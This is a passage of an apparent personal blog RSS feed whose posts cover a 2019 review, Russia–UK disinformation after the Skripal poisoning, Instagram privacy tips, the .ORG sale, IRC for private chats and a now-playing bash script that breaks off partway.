1434<p>I attended two major conferences last year—Nullcon Goa and PyCon
1435India. Both super fun experiences and I met a ton of cool people!
1436<a href="https://twitter.com/icyphox/status/1101022604851212288">Nullcon Twitter thread</a>
1437and <a href="/blog/pycon-wrap-up">PyCon blog post</a>.</p>
1438
1439<h2 id="talks">Talks</h2>
1440
1441<p>I gave two talks last year:</p>
1442
1443<ol>
1444<li><em>Intro to Reverse Engineering</em> at Cyware 2019</li>
1445<li><em>"Smart lock? Nah dude."</em> at PyCon India</li>
1446</ol>
1447
1448<h2 id="things-i-made">Things I made</h2>
1449
1450<p>Not in order, because I CBA:</p>
1451
1452<ul>
1453<li><a href="https://github.com/icyphox/repl">repl</a>: More of a quick bash hack,
1454I don’t really use it.</li>
1455<li><a href="https://github.com/icyphox/pw">pw</a>: A password manager. This,
1456I actually do use. I’ve even written a tiny
1457<a href="https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh"><code>dmenu</code> wrapper</a>
1458for it. </li>
1459<li><a href="https://github.com/icyphox/twsh">twsh</a>: An incomplete twtxt client,
1460in bash. I have yet to get around to finishing it.</li>
1461<li><a href="https://github.com/icyphox/alpine">alpine ports</a>: My APKBUILDs for
1462Alpine.</li>
1463<li><a href="https://github.com/icyphox/detotated">detotated</a>: An IRC bot written
1464in Python. See <a href="/blog/irc-for-dms">IRC for DMs</a>.</li>
1465<li><a href="https://github.com/icyphox/icyrc">icyrc</a>: A no bullshit IRC client,
1466because WeeChat is bloat.</li>
1467</ul>
1468
1469<p>I probably missed something, but whatever.</p>
1470
1471<h2 id="blog-posts">Blog posts</h2>
1472
1473<pre><code>$ ls -1 pages/blog/*.md | wc -l
147420
1475</code></pre>
1476
1477<p>So excluding today’s post, and <code>_index.md</code>, that’s 18 posts! I had
1478initially planned to write one post a month, but hey, this is great. My
1479plan for 2020 is to write one post a <em>week</em>—unrealistic, I know, but
1480I will try nevertheless.</p>
1481
1482<p>I wrote about a bunch of things, ranging from programming to
1483return-oriented-programming (heh), sysadmin and security stuff, and
1484a hint of culture and philosophy. Nice!</p>
1485
1486<p>The <a href="/blog/python-for-re-1">Python for Reverse Engineering</a> post got
1487a ton of attention on the interwebz, so that was cool.</p>
1488
1489<h2 id="bye-2019">Bye 2019</h2>
1490
1491<p>2019 was super productive! (in my terms). I learnt a lot of new things
1492last year, and I can only hope to learn as much in 2020. :)</p>
1493
1494<p>I’ll see you next week.</p>
1495]]></description><link>https://icyphox.sh/blog/2019-in-review</link><pubDate>Thu, 02 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-in-review</guid></item><item><title>Disinfo war&#58; RU vs GB</title><description><![CDATA[<p>This entire sequence of events begins with the attempted poisoning of
1496Sergei Skripal<sup class="footnote-ref" id="fnref-skripal"><a href="#fn-skripal">1</a></sup>, an ex-GRU officer who was a double-agent for
1497the UK’s intelligence services. This hit attempt happened on the 4th of
1498March, 2018. 8 days later, then-Prime Minister Theresa May formally
1499accused Russia for the attack.</p>
1500
1501<p>The toxin used in the poisoning was a nerve agent called <em>Novichok</em>.
1502In addition to the British military-research facility at Porton Down,
1503a small number of labs around the world were tasked with confirming
1504Porton Down’s conclusions on the toxin that was used, by the OPCW
1505(Organisation for the Prohibition of Chemical Weapons).</p>
1506
1507<p>With the background on the matter out of the way, here are the different
1508instances of well timed disinformation pushed out by Moscow.</p>
1509
1510<h2 id="the-russian-offense">The Russian offense</h2>
1511
1512<h3 id="april-14-2018">April 14, 2018</h3>
1513
1514<ul>
1515<li>RT published an article claiming that Spiez had identified a different
1516toxin—BZ, and not Novichok.</li>
1517<li>This was an attempt to shift the blame from Russia (origin of Novichok),
1518to NATO countries, where it was apparently in use.</li>
1519<li>Most viral piece on the matter in all of 2018.</li>
1520</ul>
1521
1522<p>Although technically correct, this isn’t the entire truth. As part of
1523protocol, the OPCW added a new substance to the sample as a test. If any
1524of the labs failed to identify this substance, their findings were
1525deemed untrustworthy. This toxin was a derivative of BZ.</p>
1526
1527<p>Here are a few interesting things to note:</p>
1528
1529<ol>
1530<li>The entire process starting with the OPCW and the labs is top-secret.
1531How did Russia even know Speiz was one of the labs?</li>
1532<li>On April 11th, the OPCW mentioned BZ in a report confirming Porton
1533Down’s findings. Note that Russia is a part of OPCW, and are fully
1534aware of the quality control measures in place. Surely they knew
1535about the reason for BZ’s use?</li>
1536</ol>
1537
1538<p>Regardless, the Russian version of the story spread fast. They cashed in
1539on two major factors to plant this disinfo:</p>
1540
1541<ol>
1542<li>“NATO bad” : Overused, but surprisingly works. People love a story
1543that goes full 180°.</li>
1544<li>Spiez can’t defend itself: At the risk of revealing that it was one
1545of the facilities testing the toxin, Spiez was only able to “not
1546comment”.</li>
1547</ol>
1548
1549<h3 id="april-3-2018">April 3, 2018</h3>
1550
1551<ul>
1552<li>The Independent publishes a story based on an interview with the chief
1553executive of Porton Down, Gary Aitkenhead.</li>
1554<li>Aitkenhead says they’ve identified Novichok but “have not identified
1555the precise source”.</li>
1556<li>Days earlier, Boris Johnson (then-Foreign Secretary) claimed that
1557Porton Down confirmed the origin of the toxin to be Russia.</li>
1558<li>This discrepancy was immediately promoted by Moscow, and its network
1559all over.</li>
1560</ul>
1561
1562<p>This one is especially interesting because of how <em>simple</em> it is to
1563exploit a small contradiction, that could’ve been an honest mistake.
1564This episode is also interesting because the British actually attempted
1565damage control this time. Porton Down tried to clarify Aitkenhead’s
1566statement via a tweet<sup class="footnote-ref" id="fnref-dstltweet"><a href="#fn-dstltweet">2</a></sup>:</p>
1567
1568<blockquote>
1569 <p>Our experts have precisely identified the nerve agent as a Novichok.
1570 It is not, and has never been, our responsibility to confirm the source
1571 of the agent @skynews @UKmoments</p>
1572</blockquote>
1573
1574<p>Quoting the <a href="https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/">Defense One</a>
1575article on the matter:</p>
1576
1577<blockquote>
1578 <p>The episode is seen by those inside Britain’s security communications team
1579 as the most serious misstep of the crisis, which for a period caused real
1580 concern. U.K. officials told me that, in hindsight, Aikenhead could never
1581 have blamed Russia directly, because that was not his job—all he was
1582 qualified to do was identify the chemical. Johnson, in going too far,
1583 was more damaging. Two years on, he is now prime minister.</p>
1584</blockquote>
1585
1586<h3 id="may-2018">May 2018</h3>
1587
1588<ul>
1589<li>OPCW facilities receive an email from Spiez inviting them to
1590a conference.</li>
1591<li>The conference itself is real, and has been organized before.</li>
1592<li>The email however, was not—attached was a Word document containing
1593malware.</li>
1594<li>Also seen were inconsistencies in the email formatting, from what was
1595normal.</li>
1596</ul>
1597
1598<p>This spearphishing campaign was never offically attributed to Moscow,
1599but there are a lot of tells here that point to it being the work of
1600a state actor:</p>
1601
1602<ol>
1603<li>Attack targetting a specific group of individuals.</li>
1604<li>Relatively high level of sophistication—email formatting,
1605malicious Word doc, etc.</li>
1606</ol>
1607
1608<p>However, the British NCSC have deemed with “high confidence” that the
1609attack was perpetrated by GRU. In the UK intelligence parlance, “highly
1610likely” / “high confidence” usually means “definitely”.</p>
1611
1612<h2 id="britains-defense">Britain’s defense</h2>
1613
1614<h3 id="september-5-2018">September 5, 2018</h3>
1615
1616<p>The UK took a lot of hits in 2018, but they eventually came back:</p>
1617
1618<ul>
1619<li>Metropolitan Police has a meeting with the press, releasing their
1620findings.</li>
1621<li>CCTV footage showing the two Russian hitmen was released.</li>
1622<li>Traces of Novichok identified in their hotel room.</li>
1623</ul>
1624
1625<p>This sudden news explosion from Britan’s side completely
1626bulldozed the information space pertaining to the entire event.
1627According to Defense One:</p>
1628
1629<blockquote>
1630 <p>Only two of the 10 most viral stories in the weeks following the announcement
1631 were sympathetic to Russia, according to NewsWhip. Finally, officials recalled,
1632 it felt as though the U.K. was the aggressor. “This was all kept secret to
1633 put the Russians on the hop,” one told me. “Their response was all over the
1634 place from this point. It was the turning point.”</p>
1635</blockquote>
1636
1637<p>Earlier in April, 4 GRU agents were arrested in the Netherlands, who
1638were there to execute a cyber operation against the OPCW (located in The
1639Hague), via their WiFi networks. They were arrested by Dutch security,
1640and later identifed as belonging to Unit 26165. They also seized a bunch
1641of equipment from the room and their car.</p>
1642
1643<blockquote>
1644 <p>The abandoned equipment revealed that the GRU unit involved had sent
1645 officers around the world to conduct similar cyberattacks. They had
1646 been in Malaysia trying to steal information about the investigation
1647 into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne,
1648 Switzerland, where a World Anti-Doping Agency (WADA) conference was taking
1649 place as Russia faced sanctions from the International Olympic Committee.
1650 Britain has said that the same GRU unit attempted to compromise Foreign
1651 Office and Porton Down computer systems after the Skripal poisoning.</p>
1652</blockquote>
1653
1654<h3 id="october-4-2018">October 4, 2018</h3>
1655
1656<p>UK made the arrests public, published a list of infractions commited by
1657Russia, along with the specific GRU unit that was caught.</p>
1658
1659<p>During this period, just one of the top 25 viral stories was from
1660a pro-Russian outlet, RT—that too a fairly straightforward piece.</p>
1661
1662<h2 id="wrapping-up">Wrapping up</h2>
1663
1664<p>As with conventional warfare, it’s hard to determine who won. Britain
1665may have had the last blow, but Moscow—yet again—depicted their
1666finesse in information warfare. Their ability to seize unexpected
1667openings, gather intel to facilitate their disinformation campaigns, and
1668their cyber capabilities makes them a formidable threat. </p>
1669
1670<p>2020 will be fun, to say the least.</p>
1671
1672<div class="footnotes">
1673<hr />
1674<ol>
1675<li id="fn-skripal">
1676<p><a href="https://en.wikipedia.org/wiki/Sergei_Skripal">https://en.wikipedia.org/wiki/Sergei_Skripal</a> <a href="#fnref-skripal" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1677</li>
1678
1679<li id="fn-dstltweet">
1680<p><a href="https://twitter.com/dstlmod/status/981220158680260613">https://twitter.com/dstlmod/status/981220158680260613</a> <a href="#fnref-dstltweet" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1681</li>
1682</ol>
1683</div>
1684]]></description><link>https://icyphox.sh/blog/ru-vs-gb</link><pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ru-vs-gb</guid></item><item><title>Instagram OPSEC</title><description><![CDATA[<p>Which I am not, of course. But seeing as most of my peers are, I am
1685compelled to write this post. Using a social platform like Instagram
1686automatically implies that the user understands (to some level) that
1687their personally identifiable information is exposed publicly, and they
1688sign up for the service understanding this risk—or I think they do,
1689anyway. But that’s about it, they go ham after that. Sharing every nitty
1690gritty detail of their private lives without understanding the potential
1691risks of doing so.</p>
1692
1693<p>The fundamentals of OPSEC dictacte that you develop a threat model, and
1694Instgrammers are <em>obviously</em> incapable of doing that—so I’ll do it
1695for them. </p>
1696
1697<h2 id="your-average-instagrammers-threat-model">Your average Instagrammer’s threat model</h2>
1698
1699<p>I stress on the word “average”, as in this doesn’t apply to those with
1700more than a couple thousand followers. Those type of accounts inherently
1701face different kinds of threats—those that come with having
1702a celebrity status, and are not in scope of this analysis.</p>
1703
1704<ul>
1705<li><p><strong>State actors</strong>: This doesn’t <em>really</em> fit into our threat model,
1706since our target demographic is simply not important enough. That said,
1707there are select groups of individuals that operate on
1708Instagram<sup class="footnote-ref" id="fnref-ddepisode"><a href="#fn-ddepisode">1</a></sup>, and they can potentially be targetted by a state
1709actor.</p></li>
1710<li><p><strong>OSINT</strong>: This is probably the biggest threat vector, simply because
1711of the amount of visual information shared on the platform. A lot can be
1712gleaned from one simple picture in a nondescript alleyway. We’ll get
1713into this in the DOs and DON’Ts in a bit.</p></li>
1714<li><p><strong>Facebook & LE</strong>: Instagram is the last place you want to be doing an
1715illegal, because well, it’s logged and more importantly—not
1716end-to-end encrypted. Law enforcement can subpoena any and all account
1717information. Quoting Instagram’s
1718<a href="https://help.instagram.com/494561080557017">page on this</a>:</p></li>
1719</ul>
1720
1721<blockquote>
1722 <p>a search warrant issued under the procedures described in the Federal
1723 Rules of Criminal Procedure or equivalent state warrant procedures
1724 upon a showing of probable cause is required to compel the disclosure
1725 of the stored contents of any account, which may include messages,
1726 photos, comments, and location information.</p>
1727</blockquote>
1728
1729<p>That out of the way, here’s a list of DOs and DON’Ts to keep in mind
1730while posting on Instagram.</p>
1731
1732<h3 id="donts">DON’Ts</h3>
1733
1734<ul>
1735<li><p>Use Instagram for planning and orchestrating illegal shit! I’ve
1736explained why this is a terrible idea above. Use secure comms—even
1737WhatsApp is a better choice, if you have nothing else. In fact, try
1738avoiding IG DMs altogether, use alternatives that implement E2EE.</p></li>
1739<li><p>Film live videos outside. Or try not to, if you can. You might
1740unknowingly include information about your location: street signs,
1741shops etc. These can be used to ascertain your current location.</p></li>
1742<li><p>Film live videos in places you visit often. This compromises your
1743security at places you’re bound to be at.</p></li>
1744<li><p>Share your flight ticket in your story! I can’t stress this enough!!!
1745Summer/winter break? “Look guys, I’m going home! Here’s where I live,
1746and here’s my flight number—feel free to track me!”. This scenario is
1747especially worrisome because the start and end points are known to the
1748threat actor, and your arrival time can be trivially looked up—thanks
1749to the flight number on your ticket. So, just don’t.</p></li>
1750<li><p>Post screenshots with OS specific details. This might border on
1751pendantic, but better safe than sorry. Your phone’s statusbar and navbar
1752are better cropped out of pictures. They reveal the time, notifications
1753(apps that you use), and can be used to identify your phone’s operating
1754system. Besides, the status/nav bar isn’t very useful to your screenshot
1755anyway.</p></li>
1756<li><p>Share your voice. In general, reduce your footprint on the platform
1757that can be used to identify you elsewhere.</p></li>
1758<li><p>Think you’re safe if your account is set to private. It doesn’t take
1759much to get someone who follows you, to show show your profile on their
1760device.</p></li>
1761</ul>
1762
1763<h3 id="dos">DOs</h3>
1764
1765<ul>
1766<li><p>Post pictures that pertain to a specific location, once you’ve moved
1767out of the location. Also applies to stories. It can wait.</p></li>
1768<li><p>Post pictures that have been shot indoors. Or try to; reasons above.
1769Who woulda thunk I’d advocate bathroom selfies?</p></li>
1770<li><p>Delete old posts that are irrelevant to your current audience. Your
1771friends at work don’t need to know about where you went to high school.</p></li>
1772</ul>
1773
1774<p>More DON’Ts than DOs, that’s very telling. Here are a few more points
1775that are good OPSEC practices in general:</p>
1776
1777<ul>
1778<li><strong>Think before you share</strong>. Does it conform to the rules mentioned above?</li>
1779<li><strong>Compartmentalize</strong>. Separate as much as you can from what you share
1780online, from what you do IRL. Limit information exposure.</li>
1781<li><strong>Assess your risks</strong>: Do this often. People change, your environments
1782change, and consequentially the risks do too.</li>
1783</ul>
1784
1785<h2 id="fin">Fin</h2>
1786
1787<p>Instagram is—much to my dismay—far too popular for it to die any
1788time soon. There are plenty of good reasons to stop using the platform
1789altogether (hint: Facebook), but that’s a discussion for another day.</p>
1790
1791<p>Or be like me:</p>
1792
1793<p><img src="/static/img/ig.jpg" alt="0 posts lul" /></p>
1794
1795<p>And that pretty much wraps it up, with a neat little bow.</p>
1796
1797<div class="footnotes">
1798<hr />
1799<ol>
1800<li id="fn-ddepisode">
1801<p><a href="https://darknetdiaries.com/episode/51/—Jack">https://darknetdiaries.com/episode/51/—Jack</a> talks about Indian hackers who operate on Instagram. <a href="#fnref-ddepisode" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1802</li>
1803</ol>
1804</div>
1805]]></description><link>https://icyphox.sh/blog/ig-opsec</link><pubDate>Mon, 02 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ig-opsec</guid></item><item><title>Save .ORG!</title><description><![CDATA[<p>The .ORG top-level domain introduced in 1985, has been operated by the
1806<a href="https://en.wikipedia.org/wiki/Public_Interest_Registry">Public Interest Registry</a> since
18072003. The .ORG TLD is used primarily by communities, free and open source projects,
1808and other non-profit organizations—although the use of the TLD isn’t
1809restricted to non-profits.</p>
1810
1811<p>The Internet Society or ISOC, the group that created the PIR, has
1812decided to sell the registry over to a private equity firm—Ethos
1813Capital.</p>
1814
1815<h2 id="whats-the-problem">What’s the problem?</h2>
1816
1817<p>There are around 10 million .ORG TLDs registered, and a good portion of
1818them are non-profits and non-governmental organizations. As the name
1819suggests, they don’t earn any profits and all their operations rely on
1820a thin inflow of donations. A private firm having control of the .ORG
1821domain gives them the power to make decisions that would be unfavourable
1822to the .ORG community:</p>
1823
1824<ul>
1825<li><p>They control the registration/renewal fees of the TLD. They can
1826hike the price if they wish to. As is stands, NGOs already earn very
1827little—a .ORG price hike would put them in a very icky situation.</p></li>
1828<li><p>They can introduce <a href="https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en">Rights Protection
1829Mechanisms</a>
1830or RPMs, which are essentially legal statements that can—if not
1831correctly developed—jeopardize / censor completely legal non-profit
1832activities.</p></li>
1833<li><p>Lastly, they can suspend domains at the whim of state actors. It isn’t
1834news that nation states go after NGOs, targetting them with allegations
1835of illegal activity. The registry being a private firm only simplifies
1836the process.</p></li>
1837</ul>
1838
1839<p>Sure, these are just “what ifs” and speculations, but the risk is real.
1840Such power can be abused and this would be severly detrimental to NGOs
1841globally.</p>
1842
1843<h2 id="how-can-i-help">How can I help?</h2>
1844
1845<p>We need to get the ISOC to <strong>stop the sale</strong>. Head over to
1846<a href="https://savedotorg.org">https://savedotorg.org</a> and sign their letter. An email is sent on your
1847behalf to:</p>
1848
1849<ul>
1850<li>Andrew Sullivan, CEO, ISOC</li>
1851<li>Jon Nevett, CEO, PIR</li>
1852<li>Maarten Botterman, Board Chair, ICANN</li>
1853<li>Göran Marby, CEO, ICANN</li>
1854</ul>
1855
1856<h2 id="closing-thoughts">Closing thoughts</h2>
1857
1858<p>The Internet that we all love and care for is slowly being subsumed by
1859megacorps and private firms, who’s only motive is to make a profit. The
1860Internet was meant to be free, and we’d better act now if we want that
1861freedom. The future looks bleak—I hope we aren’t too late.</p>
1862]]></description><link>https://icyphox.sh/blog/save-org</link><pubDate>Sat, 23 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/save-org</guid></item><item><title>Status update</title><description><![CDATA[<p>This month is mostly just unfun stuff, lined up in a neat schedule –
1863exams. I get all these cool ideas for things to do, and it’s always
1864during exams. Anyway, here’s a quick update on what I’ve been up to.</p>
1865
1866<h2 id="blog-post-queue">Blog post queue</h2>
1867
1868<p>I realized that I could use this site’s
1869<a href="https://github.com/icyphox/site">repo</a>’s issues to track blog post ideas.
1870I’ve made a few, mostly just porting them over from my Google Keep note.</p>
1871
1872<p>This method of using issues is great, because readers can chime in with
1873ideas for things I could possibly discuss—like in <a href="https://github.com/icyphox/site/issues/10">this
1874issue</a>.</p>
1875
1876<h2 id="contemplating-a-vite-rewrite">Contemplating a <code>vite</code> rewrite</h2>
1877
1878<p><a href="https://github.com/icyphox/vite"><code>vite</code></a>, despite what the name suggests
1879– is awfully slow. Also, Python is bloat.
1880Will rewriting it fix that? That’s what I plan to find out. I have
1881a couple of choices of languages to use in the rewrite:</p>
1882
1883<ul>
1884<li>C: Fast, compiled. Except I suck at it. (<code>cite</code>?)</li>
1885<li>Nim: My favourite, but I’ll have to write bindings to <a href="https://github.com/kristapsdz/lowdown"><code>lowdown(1)</code></a>. (<code>nite</code>?)</li>
1886<li>Shell: Another favourite, muh “minimalsm”. No downside, really.
1887(<code>shite</code>?)</li>
1888</ul>
1889
1890<p>Oh, and did I mention—I want it to be compatible with <code>vite</code>.
1891I don’t want to have to redo my site structure or its templates. At the
1892moment, I rely on Jinja2 for templating, so I’ll need something similar.</p>
1893
1894<h2 id="irc-bot">IRC bot</h2>
1895
1896<p>My earlier post on <a href="/blog/irc-for-dms">IRC for DMs</a> got quite a bit of
1897traction, which was pretty cool. I didn’t really talk much about the bot
1898itself though; I’m dedicating this section to
1899<a href="https://github.com/icyphox/detotated">detotated</a>.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
1900
1901<p>Fairly simple Python code, using plain sockets. So far, we’ve got a few
1902basic features in place:</p>
1903
1904<ul>
1905<li><code>.np</code> command: queries the user’s last.fm to get the currently playing
1906track</li>
1907<li>Fetches the URL title, when a URL is sent in chat</li>
1908</ul>
1909
1910<p>That’s it, really. I plan to add a <code>.nps</code>, or “now playing Spotify”
1911command, since we share Spotify links pretty often.</p>
1912
1913<h2 id="other">Other</h2>
1914
1915<p>I’ve been reading some more manga, I’ll update the <a href="/reading">reading
1916log</a> when I, well… get around to it. Haven’t had time to do
1917much in the past few weeks—the time at the end of a semester tends to
1918get pretty tight. Here’s what I plan to get back to during this winter break:</p>
1919
1920<ul>
1921<li>Russian!</li>
1922<li>Window manager in Nim</li>
1923<li><code>vite</code> rewrite, probably</li>
1924<li>The other blog posts in queue</li>
1925</ul>
1926
1927<p>I’ve also put off doing any “security work” for a while now, perhaps
1928that’ll change this December. Or whenever.</p>
1929
1930<p>With that ends my status update, on all things that I <em>haven’t</em> done.</p>
1931
1932<div class="footnotes">
1933<hr />
1934<ol>
1935<li id="fn-1">
1936<p><a href="https://knowyourmeme.com/memes/dedotated-wam">https://knowyourmeme.com/memes/dedotated-wam</a> (dead meme, yes I know) <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1937</li>
1938</ol>
1939</div>
1940]]></description><link>https://icyphox.sh/blog/2019-11-16</link><pubDate>Sat, 16 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-11-16</guid></item><item><title>IRC for DMs</title><description><![CDATA[<p><a href="https://nerdypepper.me">Nerdy</a> and I decided to try and use IRC for our
1941daily communications, as opposed to non-free alternatives like WhatsApp
1942or Telegram. This is an account of how that went.</p>
1943
1944<h2 id="the-status-quo-of-instant-messaging-apps">The status quo of instant messaging apps</h2>
1945
1946<p>I’ve tried a <em>ton</em> of messaging applications—Signal, WhatsApp,
1947Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.</p>
1948
1949<p><strong>Signal</strong>: It straight up sucks on Android. Not to mention the
1950centralized architecture, and OWS’s refusal to federate.</p>
1951
1952<p><strong>WhatsApp</strong>: Facebook’s spyware that people use without a second
1953thought. The sole reason I have it installed is for University’s
1954class groups; I can’t wait to graduate.</p>
1955
1956<p><strong>Telegram</strong>: Centralized architecture and a closed-source server. It’s
1957got a very nice Android client, though.</p>
1958
1959<p><strong>Jami</strong>: Distributed platform, free software. I am not going to comment
1960on this because I don’t recall what my experience was like, but I’m not
1961using it now… so if that’s indicative of anything.</p>
1962
1963<p><strong>Matrix (Riot)</strong>: Distributed network. Multiple client implementations.
1964Overall, pretty great, but it’s slow. I’ve had messages not send / not
1965received a lot of times. Matrix + Riot excels in group communication, but
1966really sucks for one-to-one chats.</p>
1967
1968<p><strong>Slack</strong> / <strong>Discord</strong>: <em>sigh</em></p>
1969
1970<p><strong>DeltaChat</strong>: Pretty interesting idea—on paper. Using existing email
1971infrastructure for IM sounds great, but it isn’t all that cash in
1972practice. Email isn’t instant, there’s always a delay of give or take
19735 to 10 seconds, if not more. This affects the flow of conversation.
1974I might write a small blog post later, revewing DeltaChat.<sup class="footnote-ref" id="fnref-deltachat"><a href="#fn-deltachat">2</a></sup></p>
1975
1976<h2 id="why-irc">Why IRC?</h2>
1977
1978<p>It’s free, in all senses of the word. A lot of others have done a great
1979job of answering this question in further detail, this is by far my
1980favourite:</p>
1981
1982<p><a href="https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html">https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html</a></p>
1983
1984<h2 id="using-ircs-private-messages">Using IRC’s private messages</h2>
1985
1986<p>This was the next obvious choice, but personal message buffers don’t
1987persist in ZNC and it’s very annoying to have to do a <code>/query
1988nerdypepper</code> (Weechat) or to search and message a user via Revolution
1989IRC. The only unexplored option—using a channel.</p>
1990
1991<h2 id="setting-up-a-channel-for-dms">Setting up a channel for DMs</h2>
1992
1993<p>A fairly easy process:</p>
1994
1995<ul>
1996<li><p>Set modes (on Rizon)<sup class="footnote-ref" id="fnref-modes"><a href="#fn-modes">1</a></sup>:</p>
1997
1998<pre><code>#crimson [+ilnpstz 3]
1999</code></pre>
2000
2001<p>In essence, this limits the users to 3 (one bot), sets the channel to invite only,
2002hides the channel from <code>/whois</code> and <code>/list</code>, and a few other misc.
2003modes.</p></li>
2004<li><p>Notifications: Also a trivial task; a quick modification to <a href="https://weechat.org/scripts/source/lnotify.py.html/">lnotify.py</a>
2005to send a notification for all messages in the specified buffer
2006(<code>#crimson</code>) did the trick for Weechat. Revolution IRC, on the other
2007hand, has an option to setup rules for notifications—super
2008convenient.</p></li>
2009<li><p>A bot: Lastly, a bot for a few small tasks—fetching URL titles, responding
2010to <code>.np</code> (now playing) etc. Writing an IRC bot is dead simple, and it
2011took me about an hour or two to get most of the basic functionality in
2012place. The source is <a href="https://github.com/icyphox/detotated">here</a>.
2013It is by no means “good code”; it breaks spectacularly from time to
2014time.</p></li>
2015</ul>
2016
2017<h2 id="in-conclusion">In conclusion</h2>
2018
2019<p>As the subtitle suggests, using IRC has been great. It’s probably not
2020for everyone though, but it fits my (and Nerdy’s) usecase perfectly.</p>
2021
2022<p>P.S.: <em>I’m not sure why the footnotes are reversed.</em></p>
2023
2024<div class="footnotes">
2025<hr />
2026<ol>
2027<li id="fn-modes">
2028<p>Channel modes on <a href="https://wiki.rizon.net/index.php?title=Channel_Modes">Rizon</a>. <a href="#fnref-modes" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2029</li>
2030
2031<li id="fn-deltachat">
2032<p>It’s in <a href="https://github.com/icyphox/site/issues/10">queue</a>. <a href="#fnref-deltachat" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2033</li>
2034</ol>
2035</div>
2036]]></description><link>https://icyphox.sh/blog/irc-for-dms</link><pubDate>Sun, 03 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/irc-for-dms</guid></item><item><title>The intelligence conundrum</title><description><![CDATA[<p>I watched the latest <a href="https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series)">S.W.A.T.</a>
2037episode a couple of days ago, and it highlighted some interesting issues that
2038intelligence organizations face when working with law enforcement. Side note: it’s a pretty
2039good show if you like police procedurals.</p>
2040
2041<h2 id="the-problem">The problem</h2>
2042
2043<p>Consider the following scenario:</p>
2044
2045<ul>
2046<li>There’s a local drug lord who’s been recruited to provide intel, by a certain 3-letter organization.</li>
2047<li>Local PD busts his operation and proceed to arrest him.</li>
2048<li>3-letter org steps in, wants him released.</li>
2049</ul>
2050
2051<p>So here’s the thing, his presence is a threat to public but at the same time,
2052he can be a valuable long term asset—giving info on drug inflow, exchanges and perhaps even
2053actionable intel on bigger fish who exist on top of the ladder. But he also
2054seeks security. The 3-letter org must provide him with protection,
2055in case he’s blown. And like in our case, they’d have to step in if he gets arrested.</p>
2056
2057<p>Herein lies the problem. How far should an intelligence organization go to protect an asset?
2058Who matters more, the people they’ve sworn to protect, or the asset?
2059Because afterall, in the bigger picture, local PD and intel orgs are on the same side.</p>
2060
2061<p>Thus, the question arises—how can we measure the “usefulness” of an
2062asset to better quantify the tradeoff that is to be made?
2063Is the intel gained worth the loss of public safety?
2064This question remains largely unanswered, and is quite the
2065predicament should you find yourself in it.</p>
2066
2067<p>This was a fairly short post, but an interesting problem to ponder
2068nonetheless.</p>
2069]]></description><link>https://icyphox.sh/blog/intel-conundrum</link><pubDate>Mon, 28 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/intel-conundrum</guid></item><item><title>Hacky scripts</title><description><![CDATA[<p>As a CS student, I see a lot of people around me doing courses online
2070to learn to code. Don’t get me wrong—it probably works for some.
2071Everyone learns differently. But that’s only going to get you so far.
2072Great you know the syntax, you can solve some competitive programming
2073problems, but that’s not quite enough, is it? The actual learning comes
2074from <em>applying</em> it in solving <em>actual</em> problems—not made up ones.
2075(<em>inb4 some seething CP bro comes at me</em>)</p>
2076
2077<p>Now, what’s an actual problem? Some might define it as real world
2078problems that people out there face, and solving it probably requires
2079building a product. This is what you see in hackathons, generally.</p>
2080
2081<p>If you ask me, however, I like to define it as problems that <em>you</em> yourself
2082face. This could be anything. Heck, it might not even be a “problem”. It
2083could just be an itch that you want to scratch. And this is where
2084<strong>hacky scripts</strong> come in. Unclear? Let me illustrate with a few
2085examples.</p>
2086
2087<h2 id="now-playing-status-in-my-bar">Now playing status in my bar</h2>
2088
2089<p>If you weren’t aware already—I rice my desktop. A lot. And a part of
2090this cohesive experience I try to create involves a status bar up at the
2091top of my screen, showing the time, date, volume and battery statuses etc.</p>
2092
2093<p>So here’s the “problem”. I wanted to have my currently playing song
2094(Spotify), show up on my bar. How did I approach this? A few ideas
2095popped up in my head:</p>
2096
2097<ul>
2098<li>Send <code>playerctl</code>’s STDOUT into my bar</li>
2099<li>Write a Python script to query Spotify’s API</li>
2100<li>Write a Python/shell script to query Last.fm’s API</li>
2101</ul>
2102
2103<p>The first approach bombed instantly. <code>playerctl</code> didn’t recognize my
2104Spotify client and whined about some <code>dbus</code> issues to top it off.
2105I spent a while in that rabbit hole but eventually gave up.</p>
2106
2107<p>My next avenue was the Spotify Web API. One look at the <a href="https://developer.spotify.com/documentation/web-api/">docs</a> and
2108I realize that I’ll have to make <em>more</em> than one request to fetch the
2109artist and track details. Nope, I need this to work fast.</p>
2110
2111<p>Last resort—Last.fm’s API. Spolier alert, this worked. Also, arguably
2112the best choice, since it shows the track status regardless of where
2113the music is being played. Here’s the script in its entirety:</p>
2114
2115<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
2116<span class="c1"># now playing</span>
2117<span class="c1"># requires the last.fm API key</span>
2118
2119<span class="nb">source</span> ~/.lastfm <span class="c1"># `export API_KEY="<key>"`</span>
2120<span class="nv">fg</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color15<span class="k">)</span><span class="s2">"</span>
